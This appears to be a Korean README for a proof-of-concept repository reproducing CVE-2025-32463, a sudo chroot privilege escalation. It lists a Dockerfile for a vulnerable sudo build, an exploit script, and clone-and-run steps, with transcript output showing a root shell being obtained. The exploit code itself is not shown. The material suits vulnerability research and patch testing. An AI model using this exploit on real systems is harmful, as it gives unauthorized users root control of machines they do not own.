
chroot 옵션이 있는 sudo 바이너리를 통한 root 권한 상승. CVE-2025-32463
이 저장소는 sudo의 chroot 기능에 있는 CVE‑2025‑32463 권한 상승 취약점을 시연하기 위한 최소한의 재현 가능한 환경을 제공합니다.
대부분의 Linux 배포판에서 취약한 sudo 1.9.14부터 1.9.17(모든 p‑리비전)까지의 빌드가 영향을 받습니다.
보안 페이지
| 파일 | 용도 |
|---|---|
| Dockerfile | 취약한 sudo 1.9.16p2와 빌드 도구가 포함된 Ubuntu 24.04 이미지를 빌드합니다. |
| sudo‑chwoot.sh | chroot 내부에서 루트 셸을 실행하는 개념 증명 익스플로잇입니다. |
| run.sh | 이미지를 빌드하고(필요한 경우) 익스플로잇 컨테이너를 실행하는 도우미 스크립트입니다. |
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#
run.sh는 Docker에 --privileged와 --rm을 전달하므로 컨테이너를 종료하면 자동으로 정리됩니다.
작업이 끝나면 이미지를 제거하세요:
docker rmi sudo-chwoot